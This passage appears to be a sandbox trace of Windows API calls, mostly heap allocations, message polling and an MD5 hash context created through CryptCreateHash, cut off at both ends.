| out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0257.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0257.247] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0257.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0257.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0257.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0257.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0257.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0257.248] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0257.248] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0257.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0257.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e58 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0257.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0257.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0257.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0257.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0257.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0257.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0257.249] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.249] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0257.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0257.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0257.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0257.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0257.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0257.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0257.249] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0257.249] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0257.249] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.249] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0257.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0257.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.250] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.250] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0257.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.250] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.250] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.250] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.250] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.250] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0257.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a08 | out: hHeap=0x970000) returned 1 [0257.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0257.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.250] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.251] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.251] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.251] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.251] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0257.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0257.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.251] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.251] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0257.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0257.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0257.251] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0257.251] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0257.251] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.251] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0257.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0257.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.252] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0257.252] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0257.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0257.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.252] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.252] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.252] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.252] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ce0 | out: hHeap=0x970000) returned 1 [0257.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0257.252] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.252] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0257.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0257.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0257.252] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0257.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51730, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0257.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0257.253] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0257.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0257.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0257.253] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0257.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0257.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0257.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0257.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0257.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0257.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0257.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0257.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0257.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0257.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0257.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0257.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0257.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0257.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0257.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0257.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0257.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0257.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0257.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0257.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0257.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0257.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0257.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0257.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0257.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0257.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0257.256] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0257.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0257.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0257.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0257.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0257.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0257.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 